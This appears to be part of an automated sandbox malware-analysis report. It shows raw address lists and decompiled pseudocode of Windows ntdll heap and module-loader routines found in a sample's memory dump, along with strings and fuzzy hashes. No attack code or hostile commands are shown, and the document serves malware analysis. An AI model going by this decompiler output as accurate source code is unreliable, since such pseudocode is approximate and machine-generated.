0x341cbf79
0x341cbf86
0x00000000
0x00000000
0x341cbfa3
0x341cbfaa
0x341cbfb1
0x341cbfbb
0x341cbfbb
0x341cbfc1
0x341cbfc7
0x341cbfc9
0x341cbfcf
0x341cbfd5
0x341cbfd5
0x341cbfdb
0x341cbfdc
0x341cbfe2
0x341cbfe3
0x341cbfe5
0x341cbfe6
0x341cbfed
0x341cbff1
0x00000000
0x00000000
0x341cbff7
0x341cc001
0x341cc00c
0x341cc013
0x341cc01a
0x341cc024
0x341cc02c
0x341cc038
0x341cc044
0x341cc045
0x341cc051
0x341cc05b
0x341cc05c
0x341cc06b
0x341cc06f
0x00000000
0x00000000
0x341cc086
0x341cc08a
0x341cc1ba
0x341cc1ba
0x341cc1c0
0x00000000
0x341cc1c0
0x341cc090
0x341cc096
0x341cc09c
0x341cc0a2
0x341cc0a3
0x341cc0a4
0x341cc0a7
0x341cc0a8
0x341cc0af
0x341cc0b0
0x341cc0bb
0x341cc0c3
0x341cc0cf
0x341cc0dd
0x341cc0dd
0x341cc0e8
0x341cc0ed
0x341cc138
0x341cc14f
0x341cc153
0x00000000
0x00000000
0x341cc155
0x341cc15b
0x341cc15d
0x341cc163
0x00000000
0x341cc0ef
0x341cc0ef
0x341cc0f1
0x341cc0f1
0x00000000
0x341cc0f1
0x341cc0f6
0x341cc0f6
0x341cc0f6
0x341cc0f6
0x341cc0fc
0x341cc0fc
0x341cc10c
0x341cc112
0x341cc11a
0x341cc16b
0x341cc175
0x341cc186
0x341cc187
0x341cc18a
0x341cc191
0x341cc19b
0x341cc1b8
0x00000000
0x00000000
0x341cc1b8
0x00000000
0x341cc175
0x341cc11c
0x341cc122
0x341cc127
0x341cc12f
0x341cc131
0x341cc1c5
0x341cc1cb
0x341cc1d1
0x341cc1d2
0x341cc1d8
0x341cc1e2
0x341cc1f0
0x341cc1f0
0x341cc1f7
0x341cc1f9
0x341cc1fb
0x341cc206
0x341cc206
0x341cc208
0x341cc210
0x341cc212
0x341cc212
0x00000000
0x341cbf43
0x3416a1d6
0x341cbf26
0x00000000
0x00000000
0x341cbf31
0x00000000
0x00000000
0x341cbf37
0x00000000

Strings

UseFilter, xrefs: 3416A171
FilterFullPath, xrefs: 341CC075
\??\, xrefs: 341CBF73

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: aba2af70147cec9ed8debc965a72b37baaa7337c9d7f94e4b889349d5ff70b32
Instruction ID: 2109dc5e9d1978371a11703ce7da662bda6460dbada2c5a3ab6e2fd055d83a86
Opcode Fuzzy Hash: aba2af70147cec9ed8debc965a72b37baaa7337c9d7f94e4b889349d5ff70b32
Instruction Fuzzy Hash: EEA15E76901A299FEB219F24CCC8B9AB7B9EF44714F1001E9E909A7250E7359E84CF90

Uniqueness

Uniqueness Score: -1.00%

Function 341F7090 Relevance: 4.0, Strings: 3, Instructions: 233
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E341F7090(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t121;
				signed int _t124;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t137;
				signed int _t141;
				signed int _t143;
				signed int _t155;
				signed int _t159;
				signed int _t161;
				signed int* _t164;
				signed int _t171;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				void* _t176;
				signed int _t179;
				void* _t180;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t186;
				signed int _t188;
				signed int _t189;
				void* _t190;
				void* _t192;
				short _t193;
				intOrPtr _t195;
				signed int _t199;
				void* _t201;
				void* _t203;
				void* _t205;

				_push(0x6c);
				_push(0x3424cd18);
				L341C7BE4(__ebx, __edi, __esi);
				 *(_t201 - 0x24) = 0xc0000001;
				_t195 =  *((intOrPtr*)(_t201 + 8));
				 *((intOrPtr*)(_t195 + 0x4c)) =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t180 = 4;
				_t164 = L341F79B8(_t195, _t180);
				if(_t164 != 0) {
					 *_t164 =  *_t164 & 0x00000000;
					 *(_t195 + 0x38) = _t164;
					E3417FED0(0x34264800);
					 *(_t201 - 4) =  *(_t201 - 4) & 0x00000000;
					_push(2);
					_t199 = L34217ABE(_t164, 0x341f7c20, _t195, _t195, __esi, __eflags);
					 *(_t201 - 0x24) = _t199;
					__eflags = _t199;
					if(_t199 < 0) {
						_t82 = _t195 + 0x38;
						 *_t82 =  *(_t195 + 0x38) & 0x00000000;
						__eflags =  *_t82;
						goto L32;
					} else {
						__eflags =  *(_t195 + 0x20) & 0x00000008;
						if(( *(_t195 + 0x20) & 0x00000008) == 0) {
							L32:
							__eflags = _t199;
							if(_t199 >= 0) {
								__eflags =  *(_t195 + 0x20) & 0x00000210;
								if(( *(_t195 + 0x20) & 0x00000210) != 0) {
									 *(_t201 - 0x7c) =  *(_t201 - 0x7c) | 0xffffffff;
									 *(_t201 - 0x78) =  *(_t195 + 0x40);
									 *((intOrPtr*)(_t201 - 0x70)) = E341F8250;
									 *((intOrPtr*)(_t201 - 0x6c)) = _t201 - 0x50;
									__eflags =  *(_t195 + 0x20) & 0x00000010;
									_t124 = 0;
									 *((intOrPtr*)(_t201 - 0x74)) = 3 + (_t124 & 0xffffff00 | ( *(_t195 + 0x20) & 0x00000010) != 0x00000000) * 2;
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									 *((intOrPtr*)(_t201 - 0x50)) =  *((intOrPtr*)(_t201 + 8));
									 *(_t201 - 0x4c) = _t164;
									_t106 = _t201 - 0x48;
									 *_t106 =  *(_t201 - 0x48) & 0x00000000;
									__eflags =  *_t106;
									_t108 =  &(_t164[1]); // 0x4
									 *(_t201 - 0x44) = _t108;
									_push(0);
									_push(0x2c);
									_push(_t201 - 0x7c);
									_push(2);
									_push(0);
									_t199 = E34216EF0(_t164, _t201 - 0x50, _t199,  *_t106);
									goto L35;
								}
							}
						} else {
							_t132 =  *0x34266d3c; // 0x0
							 *(_t201 - 0x2c) = _t132;
							__eflags = _t132;
							if(_t132 == 0) {
								L9:
								_t133 = 0;
								__eflags = 0;
								while(1) {
									 *(_t201 - 0x30) = _t133;
									__eflags = _t133 -  *_t164;
									if(_t133 >=  *_t164) {
										goto L32;
									}
									_t171 = _t133 << 6;
									 *(_t201 - 0x3c) = _t171;
									_t182 =  *(_t195 + 0x40);
									__eflags = _t182;
									if(_t182 == 0) {
										L13:
										_t134 =  *( &(_t164[1]) + _t171);
										 *(_t201 - 0x2c) = _t134;
										_t183 =  *(_t134 + 0x84) & 0x0000ffff;
										 *(_t201 - 0x34) = _t183;
										 *( &(_t164[6]) + _t171) = _t183;
										_t184 = _t183 << 6;
										 *(_t201 - 0x1c) = _t184;
										 *(_t201 - 0x38) = _t184;
										__eflags =  *(_t134 + 0xbc);
										if( *(_t134 + 0xbc) != 0) {
											 *( &(_t164[6]) + _t171) =  *(_t201 - 0x34) + 0x81;
											_t184 = _t184 + 0x2040;
											__eflags = _t184;
											 *(_t201 - 0x1c) = _t184;
											 *(_t201 - 0x38) = _t184;
										}
										_t173 = L341F79B8(_t195, _t184);
										 *(_t201 - 0x20) = _t173;
										__eflags = _t173;
										if(_t173 == 0) {
											goto L7;
										} else {
											E341B8F40(_t173, 0,  *(_t201 - 0x1c));
											_t205 = _t203 + 0xc;
											_t174 =  *(_t201 - 0x20);
											_t137 =  *(_t201 - 0x3c);
											 *( &(_t164[0xf]) + _t137) = _t174;
											_t186 =  *( *(_t201 - 0x2c) + 0xbc);
											 *(_t201 - 0x1c) = _t186;
											 *(_t201 - 0x40) = _t186;
											__eflags = _t186;
											if(_t186 != 0) {
												 *((intOrPtr*)( &(_t164[8]) + _t137)) = 0x81;
												 *((intOrPtr*)( &(_t164[9]) + _t137)) = 8;
												_t189 = 0;
												__eflags = 0;
												 *(_t201 - 0x28) = 0;
												_t143 =  *(_t201 - 0x1c);
												while(1) {
													__eflags = _t189 - 0x80;
													if(_t189 > 0x80) {
														goto L26;
													}
													 *_t174 =  *_t143;
													 *((intOrPtr*)(_t174 + 4)) =  *((intOrPtr*)( *(_t201 - 0x1c) + 4));
													 *(_t174 + 8) =  *( *(_t201 - 0x1c) + 8) << 3;
													 *((short*)(_t174 + 0xc)) = _t189 | 0x00008000;
													_t176 = _t174 + 0x10;
													__eflags = _t189;
													if(_t189 != 0) {
														__eflags = _t189 - 0x80;
														if(_t189 >= 0x80) {
															_push(L"VirtualAlloc");
															_t190 = 0x30;
															E34195C3F(_t176, _t190);
														} else {
															_t155 = _t189 << 3;
															__eflags = _t155;
															_push(_t155);
															_push(L"Objects=%4u");
															goto L23;
														}
													} else {
														_push(0x400);
														_push(L"Objects>%4u");
														L23:
														_push(0x30);
														_push(_t176);
														E341F776B();
														_t205 = _t205 + 0x10;
													}
													_t174 =  *(_t201 - 0x20) + 0x40;
													 *(_t201 - 0x20) = _t174;
													_t143 =  *(_t201 - 0x1c) + 0xc;
													 *(_t201 - 0x1c) = _t143;
													 *(_t201 - 0x40) = _t143;
													_t189 =  *(_t201 - 0x28) + 1;
													 *(_t201 - 0x28) = _t189;
												}
											}
											L26:
											E341B8C00(_t174,  *((intOrPtr*)( *(_t201 - 0x2c) + 0x88)), ( *( *(_t201 - 0x2c) + 0x84) & 0x0000ffff) << 6);
											_t203 = _t205 + 0xc;
											_t188 = 0;
											__eflags = 0;
											 *(_t201 - 0x28) = 0;
											_t175 =  *(_t201 - 0x20);
											while(1) {
												_t141 =  *(_t201 - 0x2c);
												__eflags = _t188 - ( *(_t141 + 0x84) & 0x0000ffff);
												if(_t188 >= ( *(_t141 + 0x84) & 0x0000ffff)) {
													break;
												}
												 *(_t175 + 8) =  *(_t175 + 8) << 3;
												_t175 = _t175 + 0x40;
												 *(_t201 - 0x20) = _t175;
												_t188 = _t188 + 1;
												 *(_t201 - 0x28) = _t188;
											}
											_t133 =  *(_t201 - 0x30);
											goto L30;
										}
									} else {
										__eflags = _t182 -  *( &(_t164[1]) + _t171);
										if(_t182 !=  *( &(_t164[1]) + _t171)) {
											L30:
											_t133 = _t133 + 1;
											continue;
										} else {
											goto L13;
										}
									}
									goto L36;
								}
								goto L32;
							} else {
								__eflags =  *(_t132 + 0x88);
								if( *(_t132 + 0x88) == 0) {
									goto L9;
								} else {
									_t192 = 0x40;
									_t159 = L341F79B8(_t195, _t192);
									 *(_t201 - 0x1c) = _t159;
									__eflags = _t159;
									if(_t159 != 0) {
										E341B8F40(_t159, 0, 0x40);
										_t203 = _t203 + 0xc;
										_t161 =  *(_t201 - 0x2c);
										_t179 =  *(_t201 - 0x1c);
										 *_t179 = _t161;
										 *((intOrPtr*)(_t179 + 4)) =  *((intOrPtr*)(_t161 + 0x40));
										_t193 = 8;
										 *((short*)(_t179 + 8)) = _t193;
										 *_t164 =  *_t164 + 1;
										__eflags =  *_t164;
										goto L9;
									} else {
										L7:
										_t199 = 0xc0000017;
										L35:
										 *(_t201 - 0x24) = _t199;
									}
								}
							}
						}
					}
					L36:
					 *(_t201 - 4) = 0xfffffffe;
					E341F7387();
					_t121 = _t199;
				} else {
					_t121 = 0xc0000017;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t201 - 0x10));
				return _t121;
			}

0x341f7090
0x341f7092
0x341f7097
0x341f709c
0x341f70ac
0x341f70af
0x341f70b4
0x341f70bc
0x341f70c0
0x341f70cc
0x341f70cf
0x341f70d7
0x341f70dc
0x341f70e0
0x341f70ee
0x341f70f0
0x341f70f3
0x341f70f5
0x341f72f6
0x341f72f6
0x341f72f6
0x00000000
0x341f70fb
0x341f70fb
0x341f70ff
0x341f72fa
0x341f72fa
0x341f72fc
0x341f72fe
0x341f7305
0x341f7307
0x341f730e
0x341f7311
0x341f731b
0x341f731e
0x341f7324
0x341f732f
0x341f7337
0x341f7338
0x341f7339
0x341f733a
0x341f733e
0x341f7341
0x341f7344
0x341f7344
0x341f7344
0x341f7348
0x341f734b
0x341f734e
0x341f7350
0x341f7355
0x341f7356
0x341f7358
0x341f735f
0x00000000
0x341f735f
0x341f7305
0x341f7105
0x341f7105
0x341f710a
0x341f710d
0x341f710f
0x341f7159
0x341f7159
0x341f7159
0x341f715b
0x341f715b
0x341f715e
0x341f7160
0x00000000
0x00000000
0x341f7168
0x341f716b
0x341f716e
0x341f7171
0x341f7173
0x341f717f
0x341f717f
0x341f7183
0x341f7186
0x341f718d
0x341f7190
0x341f7194
0x341f7197
0x341f719a
0x341f719d
0x341f71a4
0x341f71ae
0x341f71b2
0x341f71b2
0x341f71b8
0x341f71bb
0x341f71bb
0x341f71c5
0x341f71c7
0x341f71ca
0x341f71cc
0x00000000
0x341f71d2
0x341f71d8
0x341f71dd
0x341f71e0
0x341f71e3
0x341f71e6
0x341f71ed
0x341f71f3
0x341f71f6
0x341f71f9
0x341f71fb
0x341f7201
0x341f7209
0x341f7211
0x341f7211
0x341f7213
0x341f7216
0x341f7219
0x341f7219
0x341f721f
0x00000000
0x00000000
0x341f7227
0x341f722f
0x341f723b
0x341f7245
0x341f7249
0x341f724c
0x341f724e
0x341f725c
0x341f7262
0x341f727c
0x341f7283
0x341f7284
0x341f7264
0x341f7266
0x341f7266
0x341f7269
0x341f726a
0x00000000
0x341f726a
0x341f7250
0x341f7250
0x341f7255
0x341f726f
0x341f726f
0x341f7271
0x341f7272
0x341f7277
0x341f7277
0x341f728c
0x341f728f
0x341f7295
0x341f7298
0x341f729b
0x341f72a1
0x341f72a2
0x341f72a2
0x341f7219
0x341f72aa
0x341f72bf
0x341f72c4
0x341f72c7
0x341f72c7
0x341f72c9
0x341f72cc
0x341f72cf
0x341f72cf
0x341f72d9
0x341f72db
0x00000000
0x00000000
0x341f72dd
0x341f72e1
0x341f72e4
0x341f72e7
0x341f72e8
0x341f72e8
0x341f72ed
0x00000000
0x341f72ed
0x341f7175
0x341f7175
0x341f7179
0x341f72f0
0x341f72f0
0x00000000
0x00000000
0x00000000
0x00000000
0x341f7179
0x00000000
0x341f7173
0x00000000
0x341f7111
0x341f7111
0x341f7118
0x00000000
0x341f711a
0x341f711c
0x341f711f
0x341f7124
0x341f7127
0x341f7129
0x341f713a
0x341f713f
0x341f7142
0x341f7145
0x341f7148
0x341f714d
0x341f7152
0x341f7153
0x341f7157
0x341f7157
0x00000000
0x341f712b
0x341f712b
0x341f712b
0x341f7361
0x341f7361
0x341f7361
0x341f7129
0x341f7118
0x341f710f
0x341f70ff
0x341f7364
0x341f7364
0x341f736b
0x341f7370
0x341f70c2
0x341f70c2
0x341f70c2
0x341f7375
0x341f7381

Strings

Objects>%4u, xrefs: 341F7255
VirtualAlloc, xrefs: 341F727C
Objects=%4u, xrefs: 341F726A

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: Objects=%4u$Objects>%4u$VirtualAlloc
API String ID: 0-3870751728
Opcode ID: 18f4058db27b624460f4ca71d250a86ce599dcf94ac70dc72105fd8ffda3341b
Instruction ID: a9ae44e360cb2599193a9552c5dfae23d14d05ef4a9df8c325f41402911f5136
Opcode Fuzzy Hash: 18f4058db27b624460f4ca71d250a86ce599dcf94ac70dc72105fd8ffda3341b
Instruction Fuzzy Hash: EF913CB5E00A05DFEB14CF99C880B9DB7F1BF48314F14826AE915AB391E7769842CF54

Uniqueness

Uniqueness Score: -1.00%

Function 3416F75B Relevance: 3.9, Strings: 3, Instructions: 167
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E3416F75B(void* __ecx, signed short* __edx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				signed char _t63;
				signed int _t67;
				void* _t71;
				intOrPtr _t72;
				void* _t79;
				signed char* _t82;
				intOrPtr _t83;
				signed char* _t88;
				intOrPtr _t89;
				void* _t90;
				signed char* _t93;
				void* _t126;
				signed int* _t127;

				_t127 = __edx;
				_t126 = __ecx;
				_t58 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t31 =  &(_t127[4]); // 0xddeeddfe
					E341C8140(_t31, _t58 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t63 =  *(_t126 + 0xcc) ^  *0x34266d48;
				if(_t63 == 0) {
					_t63 = E3416F858(_t127,  &_v12,  &_v8);
					if(_t63 != 0) {
						_t71 = L3416FABA( &_v12,  &_v8, 0x4000);
						_t109 = _t71;
						if(_t71 < 0) {
							_t72 =  *[fs:0x30];
							__eflags =  *(_t72 + 0xc);
							if( *(_t72 + 0xc) == 0) {
								_push("HEAP: ");
								L3416B910();
							} else {
								L3416B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t126);
							_t63 = L3416B910("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t109);
						} else {
							_t79 = E34183C40();
							_t110 = 0x7ffe0380;
							if(_t79 != 0) {
								_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t82 = 0x7ffe0380;
							}
							if( *_t82 != 0) {
								_t83 =  *[fs:0x30];
								__eflags =  *(_t83 + 0x240) & 0x00000001;
								if(( *(_t83 + 0x240) & 0x00000001) != 0) {
									E3422F13E(_t110, _t126, _v12, _v8, 7);
								}
							}
							 *((intOrPtr*)(_t126 + 0x220)) =  *((intOrPtr*)(_t126 + 0x220)) + 1;
							 *((intOrPtr*)(_t126 + 0x240)) =  *((intOrPtr*)(_t126 + 0x240)) + 1;
							 *((intOrPtr*)(_t126 + 0x244)) =  *((intOrPtr*)(_t126 + 0x244)) + _v8;
							 *((intOrPtr*)(_t126 + 0x230)) =  *((intOrPtr*)(_t126 + 0x230)) + 1;
							if(E34183C40() != 0) {
								_t88 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t88 = _t110;
							}
							if( *_t88 != 0) {
								_t89 =  *[fs:0x30];
								__eflags =  *(_t89 + 0x240) & 0x00000001;
								if(( *(_t89 + 0x240) & 0x00000001) != 0) {
									__eflags = E34183C40();
									if(__eflags != 0) {
										_t110 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E3422F058(_t110, _t126, _v12, __eflags, _v8,  *(_t126 + 0x74) << 3, 0, 0,  *_t110 & 0x000000ff);
								}
							}
							_t90 = E34183C40();
							_t111 = 0x7ffe038a;
							if(_t90 != 0) {
								_t93 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t93 = 0x7ffe038a;
							}
							if( *_t93 != 0) {
								__eflags = E34183C40();
								if(__eflags != 0) {
									_t111 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								}
								E3422F058(_t111, _t126, _v12, __eflags, _v8,  *(_t126 + 0x74) << 3, 0, 0,  *_t111 & 0x000000ff);
							}
							_t63 = _t127[0] & 0x00000013 | 0x00000008;
							_t127[0] = _t63;
						}
					}
				}
				if( *((intOrPtr*)(_t126 + 0x4c)) != 0) {
					_t127[0] = _t127[0] ^ _t127[0] ^  *_t127;
					_t67 =  *(_t126 + 0x50);
					 *_t127 =  *_t127 ^ _t67;
					return _t67;
				}
				return _t63;
			}

0x3416f765
0x3416f768
0x3416f76a
0x3416f76d
0x3416f771
0x3416f779
0x3416f77c
0x341ce322
0x341ce326
0x341ce32b
0x341ce32b
0x3416f788
0x3416f78e
0x3416f79e
0x3416f7a5
0x3416f7b7
0x3416f7bc
0x3416f7c0
0x341ce419
0x341ce41f
0x341ce423
0x341ce442
0x341ce447
0x341ce425
0x341ce43a
0x341ce43f
0x341ce44d
0x341ce450
0x341ce453
0x341ce45a
0x3416f7c6
0x3416f7c6
0x3416f7cb
0x3416f7d2
0x341ce33d
0x3416f7d8
0x3416f7d8
0x3416f7d8
0x3416f7dd
0x341ce347
0x341ce34d
0x341ce354
0x341ce364
0x341ce364
0x341ce354
0x3416f7e3
0x3416f7ec
0x3416f7f2
0x3416f7f8
0x3416f805
0x341ce377
0x3416f80b
0x3416f80b
0x3416f80b
0x3416f810
0x341ce381
0x341ce387
0x341ce38e
0x341ce399
0x341ce39b
0x341ce3a6
0x341ce3a6
0x341ce3a6
0x341ce3c3
0x341ce3c3
0x341ce38e
0x3416f816
0x3416f81b
0x3416f822
0x341ce3d6
0x3416f828
0x3416f828
0x3416f828
0x3416f82d
0x341ce3e5
0x341ce3e7
0x341ce3f2
0x341ce3f2
0x341ce3f2
0x341ce40f
0x341ce40f
0x3416f838
0x3416f83a
0x3416f83a
0x3416f7c0
0x3416f7a5
0x3416f841
0x3416f84b
0x3416f84e
0x3416f851
0x00000000
0x3416f851
0x3416f857

Strings

HEAP[%wZ]: , xrefs: 341CE435
HEAP: , xrefs: 341CE442
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 341CE455

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: 0eda2c4298093410006322a7e2bddc4608e1e29186ff10495080bfefcd197dcd
Instruction ID: 138cf171da4d537ff8844ee2d3816539e850566a0c0de3d1ac2baf096d980727
Opcode Fuzzy Hash: 0eda2c4298093410006322a7e2bddc4608e1e29186ff10495080bfefcd197dcd
Instruction Fuzzy Hash: 7051C035644B84EFE712CBA8C9C4F5ABBF9EF04748F0440E5E9499B692D778E920CB50

Uniqueness

Uniqueness Score: -1.00%

Function 34191514 Relevance: 3.9, Strings: 3, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E34191514(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _t66;
				signed int _t69;
				void* _t73;
				signed int _t75;
				char* _t78;
				intOrPtr _t79;
				signed int _t80;
				char* _t83;
				intOrPtr _t84;
				signed int _t85;
				signed int _t92;
				signed char* _t93;
				signed char _t98;
				intOrPtr _t103;
				signed int _t104;
				void* _t107;
				signed int _t118;
				intOrPtr _t119;
				intOrPtr _t120;

				_t103 = __edx;
				_v8 = __ecx;
				_t118 = 0;
				_t119 =  *((intOrPtr*)(__ecx + 0x20));
				_v16 = __edx;
				_t107 = E3417DE20(__ecx, __eflags,  *((intOrPtr*)(_t119 + 0x18)), "true", 0xe,  &_v20);
				if(_t107 != 0) {
					_t66 = _v8;
					__eflags =  *(_t66 + 0x10) & 0x00800000;
					if(( *(_t66 + 0x10) & 0x00800000) != 0) {
						L19:
						_t118 = 0xc000007b;
						L6:
						return _t118;
					}
					_t69 =  *(_t119 + 0x34) | 0x00400000;
					 *(_t119 + 0x34) = _t69;
					__eflags =  *(_t107 + 0x10) & 0x00000001;
					if(__eflags == 0) {
						goto L1;
					}
					 *(_t119 + 0x34) = _t69 | 0x01000000;
					_t118 = E34166DD0( *((intOrPtr*)(_t119 + 0x18)), __eflags);
					__eflags = _t118;
					if(_t118 < 0) {
						goto L6;
					} else {
						goto L1;
					}
					goto L19;
				}
				L1:
				if(( *(_t103 + 0x16) & 0x00002000) == 0) {
					 *(_t119 + 0x34) =  *(_t119 + 0x34) & 0xfffffffb;
					goto L6;
				}
				if(( *( *((intOrPtr*)(_t119 + 0x5c)) + 0x10) & 0x00000080) != 0) {
					__eflags =  *(_t103 + 0x5e) & 0x00000080;
					if(( *(_t103 + 0x5e) & 0x00000080) != 0) {
						goto L3;
					}
					_t98 =  *0x342637c0; // 0x0
					__eflags = _t98 & 0x00000003;
					if((_t98 & 0x00000003) != 0) {
						_t45 = _t119 + 0x24; // 0x123
						E341EE692("minkernel\\ntdll\\ldrmap.c", 0x3a2, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t45);
						_t98 =  *0x342637c0; // 0x0
					}
					__eflags = _t98 & 0x00000010;
					if((_t98 & 0x00000010) != 0) {
						asm("int3");
					}
					_t118 = 0xc0000428;
					goto L6;
				}
				L3:
				if(( *(_t119 + 0x34) & 0x01000000) != 0) {
					goto L6;
				}
				_t73 = _a4 - 0x40000003;
				if(_t73 == 0 || _t73 == 0x33) {
					_v12 =  *((intOrPtr*)(_t119 + 0x18));
					_t75 = E34183C40();
					__eflags = _t75;
					if(_t75 != 0) {
						_t78 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t78 = 0x7ffe0384;
					}
					__eflags =  *_t78;
					_t104 = 0x7ffe0385;
					if( *_t78 != 0) {
						_t79 =  *[fs:0x30];
						__eflags =  *(_t79 + 0x240) & 0x00000004;
						if(( *(_t79 + 0x240) & 0x00000004) != 0) {
							_t92 = E34183C40();
							__eflags = _t92;
							if(_t92 == 0) {
								_t93 = 0x7ffe0385;
							} else {
								_t93 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t93 & 0x00000020;
							if(( *_t93 & 0x00000020) != 0) {
								E341F0227(0x1490, _v12, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					__eflags = _a4 - 0x40000003;
					if(_a4 != 0x40000003) {
						L12:
						_t120 =  *((intOrPtr*)(_t119 + 0x18));
						_t80 = E34183C40();
						__eflags = _t80;
						if(_t80 != 0) {
							_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t83 = 0x7ffe0384;
						}
						__eflags =  *_t83;
						if( *_t83 != 0) {
							_t84 =  *[fs:0x30];
							__eflags =  *(_t84 + 0x240) & 0x00000004;
							if(( *(_t84 + 0x240) & 0x00000004) != 0) {
								_t85 = E34183C40();
								__eflags = _t85;
								if(_t85 != 0) {
									_t104 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
									__eflags = _t104;
								}
								__eflags =  *_t104 & 0x00000020;
								if(( *_t104 & 0x00000020) != 0) {
									E341F0227(0x1491, _t120, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						goto L6;
					} else {
						_t21 = _t119 + 0x24; // 0x123
						_v12 = _t21;
						_t118 = E341AD3EF( *((intOrPtr*)(_t119 + 0x18)),  *((intOrPtr*)(_v8 + 0x5c)), _v16, _t21);
						__eflags = _t118;
						if(_t118 < 0) {
							L341AC98F(_t118, 0x1490, 0, _v12);
							goto L6;
						}
						goto L12;
					}
				} else {
					goto L6;
				}
			}

0x3419151f
0x34191523
0x34191526
0x34191528
0x34191536
0x3419153e
0x34191542
0x341915f5
0x341915f8
0x341915ff
0x341da34d
0x341da34d
0x3419157c
0x34191582
0x34191582
0x34191608
0x3419160d
0x34191610
0x34191614
0x00000000
0x00000000
0x341da35f
0x341da367
0x341da369
0x341da36b
0x00000000
0x341da371
0x00000000
0x341da371
0x00000000
0x341da36b
0x34191548
0x34191551
0x341da376
0x00000000
0x341da376
0x3419155e
0x341da37f
0x341da383
0x00000000
0x00000000
0x341da389
0x341da38e
0x341da390
0x341da392
0x341da3ac
0x341da3b1
0x341da3b6
0x341da3b9
0x341da3bb
0x341da3bd
0x341da3bd
0x341da3be
0x00000000
0x341da3be
0x34191564
0x3419156b
0x00000000
0x00000000
0x34191570
0x34191575
0x34191588
0x3419158b
0x34191590
0x34191592
0x341da3d1
0x34191598
0x34191598
0x34191598
0x3419159d
0x341915a0
0x341915a5
0x341da3db
0x341da3e1
0x341da3e8
0x341da3ee
0x341da3f3
0x341da3f5
0x341da407
0x341da3f7
0x341da400
0x341da400
0x341da409
0x341da40c
0x341da422
0x341da422
0x341da40c
0x341da3e8
0x341915ab
0x341915b2
0x341915d6
0x341915d6
0x341915d9
0x341915de
0x341915e0
0x341da44b
0x341915e6
0x341915e6
0x341915e6
0x341915eb
0x341915ee
0x341da455
0x341da45b
0x341da462
0x341da468
0x341da46d
0x341da46f
0x341da47a
0x341da47a
0x341da47a
0x341da480
0x341da483
0x341da498
0x341da498
0x341da483
0x341da462
0x00000000
0x341915b4
0x341915b7
0x341915be
0x341915cc
0x341915ce
0x341915d0
0x341da438
0x00000000
0x341da438
0x00000000
0x341915d0
0x00000000
0x00000000
0x00000000

Strings

minkernel\ntdll\ldrmap.c, xrefs: 341DA3A7
